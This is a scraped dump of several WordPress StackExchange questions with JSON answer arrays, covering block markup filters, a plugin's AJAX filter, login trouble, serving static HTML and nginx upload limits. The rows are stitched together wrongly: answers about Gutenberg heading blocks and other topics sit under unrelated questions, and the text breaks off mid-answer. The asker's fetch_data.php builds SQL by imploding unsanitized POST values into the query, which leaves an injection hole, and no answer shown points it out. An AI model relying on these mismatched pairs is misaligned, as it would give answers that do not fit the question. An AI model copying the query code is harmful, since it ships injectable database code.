> Source: <https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit>
>
>
>
To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.
But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the [`render_block`](https://developer.wordpress.org/reference/hooks/render_block/) filter.
You can then either use regular expressions or something more solid like a DOM Parser (e.g. <https://github.com/wasinger/htmlpagedom>) to alter the markup on output any way you like.
```
<?php
add_filter('render_block', function ($blockContent, $block) {
if ($block['blockName'] !== 'core/heading') {
return $blockContent;
}
$pattern = '/(<h[^>]*>)(.*)(<\/h[1-7]{1}>)/i';
$replacement = '$1<span>$2</span>$3';
return preg_replace($pattern, $replacement, $blockContent);
}, 10, 2);
```
I've also written [a blog post](https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters) on various ways to configure Gutenberg that also covers the `render_block` filter and some reasoning around it in case you want to dig deeper. |
376,616 | <p>I've been developing a website using WP and to display some database information in the front-end of the site i've created a plugin. Right now i want to include a filtering function for that same information using the plugin, but it does not work.</p>
<p>This is the file where i've created the filters, called <strong>show.php</strong></p>
<pre><code><div class="container">
<div class="row">
<br />
<div class="col-md-3">
<div class="list-group">
<h6>Modo de Confeção</h6>
<div style="height: 180px; overflow-y: auto; overflow-x: hidden;">
<?php
$query = "SELECT * FROM win_gab_modo_confecao ORDER BY designacaoModoConfecao";
$result = $wpdb->get_results($query);
foreach($result as $row)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector modoconf" value="<?php echo $row->idModoConfecao ?>" > <?php echo $row->designacaoModoConfecao ?></label>
</div>
<?php
}
?>
</div>
</div><br>
<div class="list-group">
<h6>Modo de Serviço</h6>
<div style="overflow-y: auto; overflow-x: hidden;">
<?php
$query2 = "SELECT * FROM win_gab_modo_servico ORDER BY designacaoModoServico";
$result2 = $wpdb->get_results($query2);
foreach($result2 as $row2)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector modoserv" value="<?php echo $row2->idModoServico ?>" > <?php echo $row2->designacaoModoServico ?></label>
</div>
<?php
}
?>
</div>
</div><br>
<div class="list-group">
<h6>Sub Categoria 1</h6>
<div style="height: 180px; overflow-y: auto; overflow-x: hidden;">
<?php
$query3 = "SELECT * FROM win_gab_sub_categorias WHERE subCategoria1 = '1' ORDER BY designacaoSubCategoria";
$result3 = $wpdb->get_results($query3);
foreach($result3 as $row3)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector sub1" value="<?php echo $row3->idSubCategoria ?>" > <?php echo $row3->designacaoSubCategoria ?></label>
</div>
<?php
}
?>
</div>
</div><br>
<div class="list-group">
<h6>Sub Categoria 2</h6>
<div style="height: 180px; overflow-y: auto; overflow-x: hidden;">
<?php
$query3 = "SELECT * FROM win_gab_sub_categorias WHERE subCategoria2 = '1' ORDER BY designacaoSubCategoria";
$result3 = $wpdb->get_results($query3);
foreach($result3 as $row3)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector sub2" value="<?php echo $row3->idSubCategoria ?>" > <?php echo $row3->designacaoSubCategoria ?></label>
</div>
<?php
}
?>
</div>
</div>
<div class="col-md-9">
<br />
<div class="row filter_data">
</div>
</div>
</div>
</div>
</code></pre>
<p>Right after this is where the problem is i believe. We begin the JS instructions that will call a file in the plugin's directory called <strong>fetch_data.php</strong>.</p>
<pre><code> $(document).ready(function(){
filter_data();
function filter_data()
{
$('.filter_data').html('<div id="loading" style="" ></div>');
var action = 'fetch_data';
var minimum_price = $('#hidden_minimum_price').val();
var maximum_price = $('#hidden_maximum_price').val();
var modoconf = get_filter('modoconf');
var modoserv = get_filter('modoserv');
var sub1 = get_filter('sub1');
var sub2 = get_filter('sub2');
$.ajax({
url:"fetch_data.php",
method:"POST",
data:{action:action, minimum_price:minimum_price, maximum_price:maximum_price, modoconf:modoconf, modoserv:modoserv, sub1:sub1, sub2:sub2},
success:function(data){
$('.filter_data').html(data);
}
});
}
function get_filter(class_name)
{
var filter = [];
$('.'+class_name+':checked').each(function(){
filter.push($(this).val());
});
return filter;
}
$('.common_selector').click(function(){
filter_data();
});
$('#price_range').slider({
range:true,
min:1000,
max:65000,
values:[1000, 65000],
step:500,
stop:function(event, ui)
{
$('#price_show').html(ui.values[0] + ' - ' + ui.values[1]);
$('#hidden_minimum_price').val(ui.values[0]);
$('#hidden_maximum_price').val(ui.values[1]);
filter_data();
}
});
</code></pre>
<p>});</p>
<p>Following this code, it calls the <strong>fetch_data.php</strong> like i mentioned above:</p>
<pre><code>global $wpdb;
if(isset($_POST["action"]))
{
$query = "
SELECT * FROM win_gab_ficha_tecnica WHERE idFichaTecnica != '0'
";
if(isset($_POST["modoconf"]))
{
$conf_filter = implode("','", $_POST["modoconf"]);
$query .= "
AND modoConfecaoFichaTecnica IN('".$conf_filter."')
";
}
if(isset($_POST["modoserv"]))
{
$serv_filter = implode("','", $_POST["modoserv"]);
$query .= "
AND modoServicoFichaTecnica IN('".$serv_filter."')
";
}
if(isset($_POST["subcat1"]))
{
$subcat1_filter = implode("','", $_POST["subcat1"]);
$query .= "
AND subCategoria1 IN('".$subcat1_filter."')
";
}
if(isset($_POST["subcat2"]))
{
$subcat2_filter = implode("','", $_POST["subcat2"]);
$query .= "
AND subCategoria2 IN('".$subcat2_filter."')
";
}
$result = $wpdb->get_results($query);
$total_row = $wpdb->rowCount();
$output = '';
if($total_row > 0)
{
foreach($result as $row)
{
$output .= '
<div class="col-sm-4 col-lg-3 col-md-3">
<div style="border:1px solid #ccc; border-radius:5px; padding:16px; margin-bottom:16px; height:450px;">
<img src="image/'. $row['fotografiaFichaTecnica'] .'" alt="" class="img-responsive" >
<p align="center"><strong><a href="#">'. $row['nomeFichaTecnica'] .'</a></strong></p>
<p>Modo Confeção: '. $row['modoConfecaoFichaTecnica'].' MP<br />
Modo Serviço: '. $row['modoServicoFichaTecnica'] .' <br />
Sub-Categoria 1: '. $row['subCategoria1'] .' GB<br />
Sub-Categoria 2: '. $row['subCategoria2'] .' GB </p>
</div>
</div>
';
}
}
else
{
$output = '<h3>No Data Found</h3>';
}
echo $output;
}
</code></pre>
<p>We've all the right calls in our plugin file for enqueuing scripts and all that stuff.
When we load the wordpress page where this info is supposed to be displayed, the filtering simply does not work, and we get this console error:</p>
<pre><code>jquery-1.10.2.min.js?ver=1.0:4 POST http://itamgabalgarve.pt/page-comidas/fetch_data.php 404 (Not Found)
</code></pre>
<p>Also, like i previosuly mentioned this is a plugin that displays the info in our custom-made theme. The page (in the theme) contains a function that calls the plugin and displays our info:</p>
<pre><code>if (function_exists(get_comidas()))
</code></pre>
| [
{
"answer_id": 376444,
"author": "kraftner",
"author_id": 47733,
"author_profile": "https://wordpress.stackexchange.com/users/47733",
"pm_score": 3,
"selected": true,
"text": "<p>Unfortunately there is now way to alter the markup of an existing block apart from <em>wrapping</em> it in additional markup:</p>\n<blockquote>\n<p>It receives the original block BlockEdit component and returns a new wrapped component.\nSource: <a href=\"https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit</a></p>\n</blockquote>\n<p>To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.</p>\n<p>But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the <a href=\"https://developer.wordpress.org/reference/hooks/render_block/\" rel=\"nofollow noreferrer\"><code>render_block</code></a> filter.</p>\n<p>You can then either use regular expressions or something more solid like a DOM Parser (e.g. <a href=\"https://github.com/wasinger/htmlpagedom\" rel=\"nofollow noreferrer\">https://github.com/wasinger/htmlpagedom</a>) to alter the markup on output any way you like.</p>\n<pre><code><?php\nadd_filter('render_block', function ($blockContent, $block) {\n\n if ($block['blockName'] !== 'core/heading') {\n return $blockContent;\n } \n\n $pattern = '/(<h[^>]*>)(.*)(<\\/h[1-7]{1}>)/i';\n $replacement = '$1<span>$2</span>$3';\n return preg_replace($pattern, $replacement, $blockContent);\n\n}, 10, 2);\n</code></pre>\n<p>I've also written <a href=\"https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters\" rel=\"nofollow noreferrer\">a blog post</a> on various ways to configure Gutenberg that also covers the <code>render_block</code> filter and some reasoning around it in case you want to dig deeper.</p>\n"
},
{
"answer_id": 386386,
"author": "Lovor",
"author_id": 135704,
"author_profile": "https://wordpress.stackexchange.com/users/135704",
"pm_score": 0,
"selected": false,
"text": "<p>It is possible to do just that by using <code>blocks.registerBlockType</code> filter. For a detailed explanation, refer <a href=\"https://jschof.com/gutenberg-blocks/using-gutenberg-filters-to-extend-blocks/\" rel=\"nofollow noreferrer\">to this article by Jim Schofield</a></p>\n<p>However, instead of calling default edit and save functions wrapped in custom code (like in the article), do not call them, just provide your own code.</p>\n"
}
] | 2020/10/16 | [
"https://wordpress.stackexchange.com/questions/376616",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196195/"
] | I've been developing a website using WP and to display some database information in the front-end of the site i've created a plugin. Right now i want to include a filtering function for that same information using the plugin, but it does not work.
This is the file where i've created the filters, called **show.php**
```
<div class="container">
<div class="row">
<br />
<div class="col-md-3">
<div class="list-group">
<h6>Modo de Confeção</h6>
<div style="height: 180px; overflow-y: auto; overflow-x: hidden;">
<?php
$query = "SELECT * FROM win_gab_modo_confecao ORDER BY designacaoModoConfecao";
$result = $wpdb->get_results($query);
foreach($result as $row)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector modoconf" value="<?php echo $row->idModoConfecao ?>" > <?php echo $row->designacaoModoConfecao ?></label>
</div>
<?php
}
?>
</div>
</div><br>
<div class="list-group">
<h6>Modo de Serviço</h6>
<div style="overflow-y: auto; overflow-x: hidden;">
<?php
$query2 = "SELECT * FROM win_gab_modo_servico ORDER BY designacaoModoServico";
$result2 = $wpdb->get_results($query2);
foreach($result2 as $row2)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector modoserv" value="<?php echo $row2->idModoServico ?>" > <?php echo $row2->designacaoModoServico ?></label>
</div>
<?php
}
?>
</div>
</div><br>
<div class="list-group">
<h6>Sub Categoria 1</h6>
<div style="height: 180px; overflow-y: auto; overflow-x: hidden;">
<?php
$query3 = "SELECT * FROM win_gab_sub_categorias WHERE subCategoria1 = '1' ORDER BY designacaoSubCategoria";
$result3 = $wpdb->get_results($query3);
foreach($result3 as $row3)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector sub1" value="<?php echo $row3->idSubCategoria ?>" > <?php echo $row3->designacaoSubCategoria ?></label>
</div>
<?php
}
?>
</div>
</div><br>
<div class="list-group">
<h6>Sub Categoria 2</h6>
<div style="height: 180px; overflow-y: auto; overflow-x: hidden;">
<?php
$query3 = "SELECT * FROM win_gab_sub_categorias WHERE subCategoria2 = '1' ORDER BY designacaoSubCategoria";
$result3 = $wpdb->get_results($query3);
foreach($result3 as $row3)
{
?>
<div class="list-group-item checkbox" style="font-size: 14;">
<label><input type="checkbox" class="common_selector sub2" value="<?php echo $row3->idSubCategoria ?>" > <?php echo $row3->designacaoSubCategoria ?></label>
</div>
<?php
}
?>
</div>
</div>
<div class="col-md-9">
<br />
<div class="row filter_data">
</div>
</div>
</div>
</div>
```
Right after this is where the problem is i believe. We begin the JS instructions that will call a file in the plugin's directory called **fetch\_data.php**.
```
$(document).ready(function(){
filter_data();
function filter_data()
{
$('.filter_data').html('<div id="loading" style="" ></div>');
var action = 'fetch_data';
var minimum_price = $('#hidden_minimum_price').val();
var maximum_price = $('#hidden_maximum_price').val();
var modoconf = get_filter('modoconf');
var modoserv = get_filter('modoserv');
var sub1 = get_filter('sub1');
var sub2 = get_filter('sub2');
$.ajax({
url:"fetch_data.php",
method:"POST",
data:{action:action, minimum_price:minimum_price, maximum_price:maximum_price, modoconf:modoconf, modoserv:modoserv, sub1:sub1, sub2:sub2},
success:function(data){
$('.filter_data').html(data);
}
});
}
function get_filter(class_name)
{
var filter = [];
$('.'+class_name+':checked').each(function(){
filter.push($(this).val());
});
return filter;
}
$('.common_selector').click(function(){
filter_data();
});
$('#price_range').slider({
range:true,
min:1000,
max:65000,
values:[1000, 65000],
step:500,
stop:function(event, ui)
{
$('#price_show').html(ui.values[0] + ' - ' + ui.values[1]);
$('#hidden_minimum_price').val(ui.values[0]);
$('#hidden_maximum_price').val(ui.values[1]);
filter_data();
}
});
```
});
Following this code, it calls the **fetch\_data.php** like i mentioned above:
```
global $wpdb;
if(isset($_POST["action"]))
{
$query = "
SELECT * FROM win_gab_ficha_tecnica WHERE idFichaTecnica != '0'
";
if(isset($_POST["modoconf"]))
{
$conf_filter = implode("','", $_POST["modoconf"]);
$query .= "
AND modoConfecaoFichaTecnica IN('".$conf_filter."')
";
}
if(isset($_POST["modoserv"]))
{
$serv_filter = implode("','", $_POST["modoserv"]);
$query .= "
AND modoServicoFichaTecnica IN('".$serv_filter."')
";
}
if(isset($_POST["subcat1"]))
{
$subcat1_filter = implode("','", $_POST["subcat1"]);
$query .= "
AND subCategoria1 IN('".$subcat1_filter."')
";
}
if(isset($_POST["subcat2"]))
{
$subcat2_filter = implode("','", $_POST["subcat2"]);
$query .= "
AND subCategoria2 IN('".$subcat2_filter."')
";
}
$result = $wpdb->get_results($query);
$total_row = $wpdb->rowCount();
$output = '';
if($total_row > 0)
{
foreach($result as $row)
{
$output .= '
<div class="col-sm-4 col-lg-3 col-md-3">
<div style="border:1px solid #ccc; border-radius:5px; padding:16px; margin-bottom:16px; height:450px;">
<img src="image/'. $row['fotografiaFichaTecnica'] .'" alt="" class="img-responsive" >
<p align="center"><strong><a href="#">'. $row['nomeFichaTecnica'] .'</a></strong></p>
<p>Modo Confeção: '. $row['modoConfecaoFichaTecnica'].' MP<br />
Modo Serviço: '. $row['modoServicoFichaTecnica'] .' <br />
Sub-Categoria 1: '. $row['subCategoria1'] .' GB<br />
Sub-Categoria 2: '. $row['subCategoria2'] .' GB </p>
</div>
</div>
';
}
}
else
{
$output = '<h3>No Data Found</h3>';
}
echo $output;
}
```
We've all the right calls in our plugin file for enqueuing scripts and all that stuff.
When we load the wordpress page where this info is supposed to be displayed, the filtering simply does not work, and we get this console error:
```
jquery-1.10.2.min.js?ver=1.0:4 POST http://itamgabalgarve.pt/page-comidas/fetch_data.php 404 (Not Found)
```
Also, like i previosuly mentioned this is a plugin that displays the info in our custom-made theme. The page (in the theme) contains a function that calls the plugin and displays our info:
```
if (function_exists(get_comidas()))
``` | Unfortunately there is now way to alter the markup of an existing block apart from *wrapping* it in additional markup:
>
> It receives the original block BlockEdit component and returns a new wrapped component.
> Source: <https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit>
>
>
>
To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.
But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the [`render_block`](https://developer.wordpress.org/reference/hooks/render_block/) filter.
You can then either use regular expressions or something more solid like a DOM Parser (e.g. <https://github.com/wasinger/htmlpagedom>) to alter the markup on output any way you like.
```
<?php
add_filter('render_block', function ($blockContent, $block) {
if ($block['blockName'] !== 'core/heading') {
return $blockContent;
}
$pattern = '/(<h[^>]*>)(.*)(<\/h[1-7]{1}>)/i';
$replacement = '$1<span>$2</span>$3';
return preg_replace($pattern, $replacement, $blockContent);
}, 10, 2);
```
I've also written [a blog post](https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters) on various ways to configure Gutenberg that also covers the `render_block` filter and some reasoning around it in case you want to dig deeper. |
376,630 | <p>The main Issues is that I am entering the email address & password that I used in creating my WordPress site in digital but It shows that the email address & username doesn’t exist even I checked in my PhpMyAdmin “WordPress” “wp-user” and I am using the right email, username and password but still shows that user doesn’t exist. However, I tried changing password by using “lost password” section but in that whenever enter my username or email to get a password reset link it shows user doesn’t exist, so what should I do to fix, please help…</p>
<p>I appreciate any answer, please help, if need any other pieces of information with this issue I can give.</p>
<p>Thank you...</p>
| [
{
"answer_id": 376444,
"author": "kraftner",
"author_id": 47733,
"author_profile": "https://wordpress.stackexchange.com/users/47733",
"pm_score": 3,
"selected": true,
"text": "<p>Unfortunately there is now way to alter the markup of an existing block apart from <em>wrapping</em> it in additional markup:</p>\n<blockquote>\n<p>It receives the original block BlockEdit component and returns a new wrapped component.\nSource: <a href=\"https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit</a></p>\n</blockquote>\n<p>To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.</p>\n<p>But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the <a href=\"https://developer.wordpress.org/reference/hooks/render_block/\" rel=\"nofollow noreferrer\"><code>render_block</code></a> filter.</p>\n<p>You can then either use regular expressions or something more solid like a DOM Parser (e.g. <a href=\"https://github.com/wasinger/htmlpagedom\" rel=\"nofollow noreferrer\">https://github.com/wasinger/htmlpagedom</a>) to alter the markup on output any way you like.</p>\n<pre><code><?php\nadd_filter('render_block', function ($blockContent, $block) {\n\n if ($block['blockName'] !== 'core/heading') {\n return $blockContent;\n } \n\n $pattern = '/(<h[^>]*>)(.*)(<\\/h[1-7]{1}>)/i';\n $replacement = '$1<span>$2</span>$3';\n return preg_replace($pattern, $replacement, $blockContent);\n\n}, 10, 2);\n</code></pre>\n<p>I've also written <a href=\"https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters\" rel=\"nofollow noreferrer\">a blog post</a> on various ways to configure Gutenberg that also covers the <code>render_block</code> filter and some reasoning around it in case you want to dig deeper.</p>\n"
},
{
"answer_id": 386386,
"author": "Lovor",
"author_id": 135704,
"author_profile": "https://wordpress.stackexchange.com/users/135704",
"pm_score": 0,
"selected": false,
"text": "<p>It is possible to do just that by using <code>blocks.registerBlockType</code> filter. For a detailed explanation, refer <a href=\"https://jschof.com/gutenberg-blocks/using-gutenberg-filters-to-extend-blocks/\" rel=\"nofollow noreferrer\">to this article by Jim Schofield</a></p>\n<p>However, instead of calling default edit and save functions wrapped in custom code (like in the article), do not call them, just provide your own code.</p>\n"
}
] | 2020/10/16 | [
"https://wordpress.stackexchange.com/questions/376630",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196211/"
] | The main Issues is that I am entering the email address & password that I used in creating my WordPress site in digital but It shows that the email address & username doesn’t exist even I checked in my PhpMyAdmin “WordPress” “wp-user” and I am using the right email, username and password but still shows that user doesn’t exist. However, I tried changing password by using “lost password” section but in that whenever enter my username or email to get a password reset link it shows user doesn’t exist, so what should I do to fix, please help…
I appreciate any answer, please help, if need any other pieces of information with this issue I can give.
Thank you... | Unfortunately there is now way to alter the markup of an existing block apart from *wrapping* it in additional markup:
>
> It receives the original block BlockEdit component and returns a new wrapped component.
> Source: <https://developer.wordpress.org/block-editor/developers/filters/block-filters/#editor-blockedit>
>
>
>
To achieve what you want in the editor currently the only way would be to create your own version of the heading block replacing the core one.
But what you can do, and probably is the better way to do it anyway since you leave the default markup in the DB in place, is change the markup on render using the [`render_block`](https://developer.wordpress.org/reference/hooks/render_block/) filter.
You can then either use regular expressions or something more solid like a DOM Parser (e.g. <https://github.com/wasinger/htmlpagedom>) to alter the markup on output any way you like.
```
<?php
add_filter('render_block', function ($blockContent, $block) {
if ($block['blockName'] !== 'core/heading') {
return $blockContent;
}
$pattern = '/(<h[^>]*>)(.*)(<\/h[1-7]{1}>)/i';
$replacement = '$1<span>$2</span>$3';
return preg_replace($pattern, $replacement, $blockContent);
}, 10, 2);
```
I've also written [a blog post](https://kraftner.com/en/blog/the-taming-of-the-block-part-ii-the-practical-part/#post-processing-with-render-filters) on various ways to configure Gutenberg that also covers the `render_block` filter and some reasoning around it in case you want to dig deeper. |
376,643 | <p>Here's what I'm trying to do:</p>
<p>Page URL: <code>https://example.com/the-page/</code></p>
<p>What it should load: <code>https://example.com/content/oct2020/index.html</code></p>
<p>When visitors go to the permalink /the-page/, I'd like that permalink to stay exactly the same. But instead of loading content & template files from the WordPress database, it would just display the index.html file instead.</p>
<p>I do <em>not</em> want someone to visit "/the-page/" permalink, and then be 301'd to <a href="https://example.com/content/oct2020/index.html" rel="nofollow noreferrer">https://example.com/content/oct2020/index.html</a>.</p>
<p>I know this can be done with a Page Template, but then I'd need all the files to be inside my WP themes directory. Instead I want to host these HTML files in a separate directory, totally theme-agnostic. Is there a plugin offering this kind of functionality, or would it be easy to code up as a functions.php addon? Or would the easiest solution be adding a line into my .htaccess file?</p>
| [
{
"answer_id": 376644,
"author": "Montassar Billeh Hazgui",
"author_id": 104567,
"author_profile": "https://wordpress.stackexchange.com/users/104567",
"pm_score": 1,
"selected": false,
"text": "<p>First of all, you need to create a new empty folder in the root folder of your WordPress website. Typically, it is located here: /public_html/. So, the location of our HTML template will be /public_html/landing/, where ‘landing’ is the name of the folder with our template. The page will be available at <a href=\"http://www.domain.com/landing/\" rel=\"nofollow noreferrer\">http://www.domain.com/landing/</a>. There are many ways to upload files to your hosting. You can use a standalone file manager (e.g. Total Commander or FileZilla).</p>\n"
},
{
"answer_id": 376645,
"author": "Pat J",
"author_id": 16121,
"author_profile": "https://wordpress.stackexchange.com/users/16121",
"pm_score": 2,
"selected": false,
"text": "<p>You can use the <a href=\"https://developer.wordpress.org/reference/hooks/template_include/\" rel=\"nofollow noreferrer\"><code>template_include</code> hook</a> to accomplish this.</p>\n<p>Add this to your active theme's <code>functions.php</code> file (or <a href=\"https://developer.wordpress.org/plugins/\" rel=\"nofollow noreferrer\">create a plugin</a>).</p>\n<pre><code>add_filter( 'template_include', 'wpse376643_load_html_page' );\nfunction wpse376643_load_html_page( $template ) {\n if ( is_page( 'the-page' ) ) {\n // You'll have to use the server path to your index.html file.\n $template = '/path/to/your/content/oct2020/index.html';\n }\n return $template;\n}\n</code></pre>\n"
}
] | 2020/10/16 | [
"https://wordpress.stackexchange.com/questions/376643",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/8922/"
] | Here's what I'm trying to do:
Page URL: `https://example.com/the-page/`
What it should load: `https://example.com/content/oct2020/index.html`
When visitors go to the permalink /the-page/, I'd like that permalink to stay exactly the same. But instead of loading content & template files from the WordPress database, it would just display the index.html file instead.
I do *not* want someone to visit "/the-page/" permalink, and then be 301'd to <https://example.com/content/oct2020/index.html>.
I know this can be done with a Page Template, but then I'd need all the files to be inside my WP themes directory. Instead I want to host these HTML files in a separate directory, totally theme-agnostic. Is there a plugin offering this kind of functionality, or would it be easy to code up as a functions.php addon? Or would the easiest solution be adding a line into my .htaccess file? | You can use the [`template_include` hook](https://developer.wordpress.org/reference/hooks/template_include/) to accomplish this.
Add this to your active theme's `functions.php` file (or [create a plugin](https://developer.wordpress.org/plugins/)).
```
add_filter( 'template_include', 'wpse376643_load_html_page' );
function wpse376643_load_html_page( $template ) {
if ( is_page( 'the-page' ) ) {
// You'll have to use the server path to your index.html file.
$template = '/path/to/your/content/oct2020/index.html';
}
return $template;
}
``` |
376,649 | <p>This message occurs whenever I attempt to upload a file greater than 2M in wordpress. I have made the follow changes in order to increase the allowed file upload sizes:</p>
<p>In nginx.conf, I added</p>
<pre><code>client_max_body_size 200M;
</code></pre>
<p>In php.ini, I modified</p>
<pre><code>upload_max_filesize = 200M
max_file_uploads = 20
Post_max_size = 256M
</code></pre>
<p>In wp-config.php, I added</p>
<pre><code>@ini_set( 'upload_max_filesize' , '200M' );
@ini_set( 'post_max_size' , '256M' );
@ini_set( 'memory_limit' , 256M' );
</code></pre>
<p>Even with these parameters set in the three configuration files I am still getting the message
<strong>413 Request Entity Too Large nginx/1.18.0 (Ubuntu)</strong></p>
<p>Can anyone help?</p>
| [
{
"answer_id": 376644,
"author": "Montassar Billeh Hazgui",
"author_id": 104567,
"author_profile": "https://wordpress.stackexchange.com/users/104567",
"pm_score": 1,
"selected": false,
"text": "<p>First of all, you need to create a new empty folder in the root folder of your WordPress website. Typically, it is located here: /public_html/. So, the location of our HTML template will be /public_html/landing/, where ‘landing’ is the name of the folder with our template. The page will be available at <a href=\"http://www.domain.com/landing/\" rel=\"nofollow noreferrer\">http://www.domain.com/landing/</a>. There are many ways to upload files to your hosting. You can use a standalone file manager (e.g. Total Commander or FileZilla).</p>\n"
},
{
"answer_id": 376645,
"author": "Pat J",
"author_id": 16121,
"author_profile": "https://wordpress.stackexchange.com/users/16121",
"pm_score": 2,
"selected": false,
"text": "<p>You can use the <a href=\"https://developer.wordpress.org/reference/hooks/template_include/\" rel=\"nofollow noreferrer\"><code>template_include</code> hook</a> to accomplish this.</p>\n<p>Add this to your active theme's <code>functions.php</code> file (or <a href=\"https://developer.wordpress.org/plugins/\" rel=\"nofollow noreferrer\">create a plugin</a>).</p>\n<pre><code>add_filter( 'template_include', 'wpse376643_load_html_page' );\nfunction wpse376643_load_html_page( $template ) {\n if ( is_page( 'the-page' ) ) {\n // You'll have to use the server path to your index.html file.\n $template = '/path/to/your/content/oct2020/index.html';\n }\n return $template;\n}\n</code></pre>\n"
}
] | 2020/10/16 | [
"https://wordpress.stackexchange.com/questions/376649",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/196179/"
] | This message occurs whenever I attempt to upload a file greater than 2M in wordpress. I have made the follow changes in order to increase the allowed file upload sizes:
In nginx.conf, I added
```
client_max_body_size 200M;
```
In php.ini, I modified
```
upload_max_filesize = 200M
max_file_uploads = 20
Post_max_size = 256M
```
In wp-config.php, I added
```
@ini_set( 'upload_max_filesize' , '200M' );
@ini_set( 'post_max_size' , '256M' );
@ini_set( 'memory_limit' , 256M' );
```
Even with these parameters set in the three configuration files I am still getting the message
**413 Request Entity Too Large nginx/1.18.0 (Ubuntu)**
Can anyone help? | You can use the [`template_include` hook](https://developer.wordpress.org/reference/hooks/template_include/) to accomplish this.
Add this to your active theme's `functions.php` file (or [create a plugin](https://developer.wordpress.org/plugins/)).
```
add_filter( 'template_include', 'wpse376643_load_html_page' );
function wpse376643_load_html_page( $template ) {
if ( is_page( 'the-page' ) ) {
// You'll have to use the server path to your index.html file.
$template = '/path/to/your/content/oct2020/index.html';
}
return $template;
}
``` |
376,692 | <p>The problem I'm having is the custom logo, site title, and description won't appear at the same time. In image 1 below, you can see that with no custom logo, the site title, and description appears just fine.</p>
<pre class="lang-php prettyprint-override"><code><div id="hotwp-logo">
<?php if ( has_custom_logo() ) : ?>
<div class="site-branding">
<a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home" class="hotwp-logo-img-link">
<img src="<?php echo esc_url( hotwp_custom_logo() ); ?>" alt="" class="hotwp-logo-img"/>
</a>
</div>
<?php else: ?>
<div class="site-branding">
<h1 class="hotwp-site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1>
<p class="hotwp-site-description"><?php bloginfo( 'description' ); ?></p>
</div>
<?php endif; ?>
</div><!--/#hotwp-logo -->
</code></pre>
<p><strong>When I don’t have a logo, the tag line and the description is shown.</strong></p>
<p><strong>Image 1</strong> <img src="https://hosting.photobucket.com/images/w361/EZingers/Screenshot_at_2019_07_16_14_37_49.png?width=1920&height=1080&fit=bounds" alt="Image 1" /></p>
<p><strong>When I add a custom logo, the tag line and the description disappears.</strong></p>
<p><strong>Image 2</strong> <img src="https://hosting.photobucket.com/images/w361/EZingers/Screenshot_at_2019_07_16_14_39_15.png?width=1920&height=1080&fit=bounds" alt="Image 2 @" /></p>
<p><strong>This was edited to show what I need. The tag line and the description need to show, shifting to the right of the logo.</strong></p>
<p><strong>Image 3</strong> <img src="https://hosting.photobucket.com/images/w361/EZingers/Screenshot_at_2019_07_16_14_39_16.png?width=1920&height=1080&fit=bounds" alt="Image 3" /></p>
| [
{
"answer_id": 376700,
"author": "Jim Worrall",
"author_id": 195306,
"author_profile": "https://wordpress.stackexchange.com/users/195306",
"pm_score": 2,
"selected": false,
"text": "<p>Maybe I'm missing something here, but it looks like you have an if-else. If there is a logo, it shows. Else the title and description show. Try removing the if-else stuff.</p>\n"
},
{
"answer_id": 376702,
"author": "Tony Djukic",
"author_id": 60844,
"author_profile": "https://wordpress.stackexchange.com/users/60844",
"pm_score": 2,
"selected": false,
"text": "<p>Ricky, you'll have to write the proper CSS to get it to display exactly as you want it to, but the problem you're having is that you're ONLY requesting the custom logo IF the custom logo exists. IF it doesn't exist, you're asking for the title and the description, but ONLY if there is no logo.</p>\n<p>Try this instead:</p>\n<pre><code><div id="hotwp-logo">\n<?php if( has_custom_logo() ) : ?>\n <div class="site-branding">\n <div class="logo-container">\n <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home" class="hotwp-logo-img-link">\n <img src="<?php echo esc_url( hotwp_custom_logo() ); ?>" alt="" class="hotwp-logo-img"/>\n </a>\n </div>\n <div class="title-container">\n <h1 class="hotwp-site-title">\n <a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a>\n </h1>\n <p class="hotwp-site-description"><?php bloginfo( 'description' ); ?></p>\n </div>\n </div>\n<?php else : ?>\n <div class="site-branding no-logo">\n <div class="title-container">\n <h1 class="hotwp-site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1>\n <p class="hotwp-site-description"><?php bloginfo( 'description' ); ?></p>\n </div>\n 